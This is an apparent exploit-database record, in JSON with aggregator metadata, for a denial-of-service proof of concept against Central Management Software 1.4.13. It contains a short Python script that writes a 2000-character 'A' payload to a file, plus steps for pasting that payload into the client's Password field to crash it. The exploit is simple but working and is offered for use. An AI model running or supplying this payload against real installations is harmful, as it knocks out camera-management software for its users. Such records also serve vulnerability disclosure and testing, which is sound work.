Description
Central Management Software 1.4.13 - Denial of Service (PoC)
{"lastseen": "2020-04-01T19:04:08", "references": [], "description": "\nCentral Management Software 1.4.13 - Denial of Service (PoC)", "edition": 1, "reporter": "Gionathan Reale", "exploitpack": {"type": "dos", "platform": "windows_x86-64"}, "published": "2018-08-16T00:00:00", "title": "Central Management Software 1.4.13 - Denial of Service (PoC)", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-08-16T00:00:00", "id": "EXPLOITPACK:7EFDBEBA9C62E768F3A808096439F01B", "href": "", "viewCount": 2, "sourceData": "# Exploit Title: Central Management Software v1.4.13 - Denial of Service (PoC) \n# Author: Gionathan \"John\" Reale\n# Discovey Date: 2018-08-16\n# Homepage: https://www.ambientweather.com\n# Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/Manuals/ambientcam/04_central_management_software.zip\n# Tested Version: 1.4.13\n# Tested on OS: Windows 10\n# Steps to Reproduce: Run the python exploit script, it will create a new \n# file with the name \"exploit.txt\" just copy the text inside \"exploit.txt\"\n# and start the CMS client program. In the new window paste the content of \n# \"exploit.txt\" into the following fields:\"Password\". Click \"Login\" and you will see a crash.\n\n#!/usr/bin/python\n \nbuffer = \"A\" * 2000\n\npayload = buffer\ntry:\n f=open(\"exploit.txt\",\"w\")\n print \"[+] Creating %s bytes evil payload..\" %len(payload)\n f.write(payload)\n f.close()\n print \"[+] File created!\"\nexcept:\n print \"File cannot be created\"", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645664857}}
{}